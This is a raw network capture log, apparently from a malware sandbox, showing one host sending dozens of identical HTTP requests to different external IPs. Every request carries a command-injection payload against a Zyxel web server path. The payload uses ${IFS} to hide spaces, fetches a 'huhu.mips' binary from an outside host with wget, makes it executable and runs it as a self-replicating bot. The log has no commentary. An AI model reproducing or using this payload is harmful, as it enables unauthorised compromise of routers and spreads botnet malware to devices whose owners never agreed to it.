                                                Jan 29, 2024 07:07:50.386213064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4870192.168.2.2335258150.228.12.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386250973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4871192.168.2.2343794166.28.239.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386267900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4872192.168.2.2341158205.62.155.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386302948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4873192.168.2.2345106183.191.163.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386358023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4874192.168.2.2335988168.37.101.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386394024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4875192.168.2.2360130183.45.77.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386440039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4876192.168.2.2341700181.190.232.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386466026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4877192.168.2.23408185.168.189.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386526108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4878192.168.2.2344428178.156.100.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386570930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4879192.168.2.2343944156.220.52.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386626005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4880192.168.2.2359284112.104.111.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386656046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4881192.168.2.2354860216.8.108.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386676073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4882192.168.2.235417095.129.94.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386708021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4883192.168.2.235392658.112.22.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386763096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4884192.168.2.2334430162.73.168.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386797905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4885192.168.2.235758698.5.186.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386842012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4886192.168.2.2352086142.56.35.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386882067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4887192.168.2.233844617.221.253.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386910915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4888192.168.2.2343666154.8.158.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386959076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4889192.168.2.2345032188.95.18.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386996031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4890192.168.2.235399269.177.195.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387034893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4891192.168.2.233632470.187.239.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387067080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4892192.168.2.234975898.141.30.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387108088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4893192.168.2.2340724119.216.182.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387136936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4894192.168.2.235800459.62.66.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387176991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4895192.168.2.2359500180.125.73.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387216091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4896192.168.2.2347500177.0.60.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387259960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4897192.168.2.2355378145.164.212.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387284994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4898192.168.2.2356470119.106.172.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387330055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4899192.168.2.2351616121.0.224.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387376070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4900192.168.2.2338516135.74.154.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387403011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4901192.168.2.2335902218.158.119.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387455940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4902192.168.2.234806012.181.64.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387505054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4903192.168.2.2350098216.142.117.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387531996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4904192.168.2.2348302142.96.25.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387577057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4905192.168.2.2360916141.206.79.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387619972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4906192.168.2.2349966116.16.47.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387669086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4907192.168.2.234433627.20.146.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387702942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4908192.168.2.2350034165.103.191.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387754917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4909192.168.2.235159494.144.234.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387789965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4910192.168.2.234603273.224.85.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387818098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4911192.168.2.235770034.68.164.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387851954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4912192.168.2.2353814136.19.20.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387872934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4913192.168.2.235612674.27.249.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387943983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4914192.168.2.2339884195.29.235.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.387969017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4915192.168.2.234066684.157.246.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388015032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4916192.168.2.233574046.95.48.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388067007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4917192.168.2.234351499.249.160.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388079882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4918192.168.2.2349808159.75.205.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388128042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4919192.168.2.234538298.209.227.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388164997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4920192.168.2.2357384135.174.148.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388180017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4921192.168.2.2346640147.222.37.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388215065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4922192.168.2.2343326221.115.46.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388271093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4923192.168.2.234446284.181.70.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388310909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4924192.168.2.2341386118.113.201.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388350010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4925192.168.2.2352698135.104.139.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388379097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4926192.168.2.2344986123.10.118.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388422012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4927192.168.2.235216666.216.117.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388465881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4928192.168.2.2337560116.198.102.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388504982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4929192.168.2.235495088.164.181.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388549089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4930192.168.2.2334268189.180.218.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388581038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4931192.168.2.2345150151.23.150.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388628960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4932192.168.2.2349948108.219.166.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388655901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4933192.168.2.2345602176.158.0.177443
                                                TimestampBytes transferredDirectionData
